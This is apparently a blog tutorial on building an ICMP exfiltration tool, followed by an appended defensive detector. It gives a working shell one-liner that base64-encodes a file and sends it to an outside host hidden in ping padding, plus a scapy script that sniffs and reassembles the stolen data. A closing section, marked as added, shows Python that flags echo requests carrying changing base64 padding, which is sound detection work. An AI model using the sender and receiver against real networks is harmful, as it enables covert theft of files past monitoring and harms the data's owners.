DATA EXFILTRATION WITH ICMP PROTOCOL

Ever been curious about building your own ICMP exfiltration tool? Here is a minimal one: the sender hides data in ping padding, and the receiver reassembles it off the wire.

Sending data

This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into the ping padding via the -p pattern option.

Obviously you should change the IP before sending 🙂

base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done

Receiving data

You can grab the data off the wire using scapy. Here's a short script that takes an output file name as the first argument and an optional interface name to listen on as the second argument.

from scapy.all import conf, sniff, ICMP, Raw
import sys
import base64

# script to extract data from ping padding (http://wumb0.in/ping-exfil.html)

# optional second argument: interface to listen on
if len(sys.argv) > 2:
    conf.iface = sys.argv[2]

def is_echo(pkt):
    # only ICMP echo requests (type 8) that actually carry a payload
    return pkt.haslayer(ICMP) and pkt[ICMP].type == 8 and pkt.haslayer(Raw)

# the 16-byte pattern sits after the 8-byte timestamp in the ping payload;
# stop once the newline that terminates the base64 text shows up
s = sniff(lfilter=is_echo,
          stop_filter=lambda x: is_echo(x) and b'\n' in x[ICMP][Raw].load[8:24])

buf = b""
for i in s:
    buf += i[ICMP][Raw].load[8:24]

# payload is bytes, so write the decoded file in binary mode
with open(sys.argv[1], "wb") as f:
    f.write(base64.b64decode(buf[:buf.find(b'\n')]))
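For the defensive side, here is an added example (not from the original post) of the detection logic a sensor could apply to this traffic: it parses raw IPv4/ICMP bytes, treats the first 8 payload bytes as the timestamp just as the receiver above does, and alerts when the padding consists only of base64 characters and differs from the previous echo request from the same source (a normal ping reuses a fixed padding pattern). The function names and the sample packets are constructed for the example.

```python
import ipaddress
import string
import struct
from collections import defaultdict

# bytes a base64-encoded file would leave in the padding (newline included)
B64_ALPHABET = set((string.ascii_letters + string.digits + "+/=\n").encode())

def parse_icmp_echo(ip_pkt):
    """Return (src, payload) for an IPv4 ICMP echo request, else None."""
    ihl = (ip_pkt[0] & 0x0F) * 4
    if ip_pkt[9] != 1:                  # IP protocol 1 = ICMP
        return None
    icmp = ip_pkt[ihl:]
    if icmp[0] != 8:                    # ICMP type 8 = echo request
        return None
    src = str(ipaddress.IPv4Address(ip_pkt[12:16]))
    return src, icmp[8:]                # skip type, code, checksum, id, seq

class PingPadDetector:
    """Alert on echo requests whose padding is base64 text that changes between pings."""
    def __init__(self):
        self.last_pad = defaultdict(lambda: None)   # per-source padding seen last

    def check(self, ip_pkt):
        parsed = parse_icmp_echo(ip_pkt)
        if parsed is None:
            return None                 # not an echo request: nothing to judge
        src, payload = parsed
        pad = payload[8:]               # assumes an 8-byte timestamp, like the receiver
        b64_like = bool(pad) and all(b in B64_ALPHABET for b in pad)
        changed = self.last_pad[src] is not None and self.last_pad[src] != pad
        self.last_pad[src] = pad
        return bool(b64_like and changed)

def build_echo(src, payload):
    """Construct a minimal IPv4 + ICMP echo request (sample input, checksums zeroed)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64, 1, 0,
                         ipaddress.IPv4Address(src).packed, b"\x0a\x00\x00\x01")
    icmp_hdr = struct.pack("!BBHHH", 8, 0, 0, 1, 1)
    return ip_hdr + icmp_hdr + payload
```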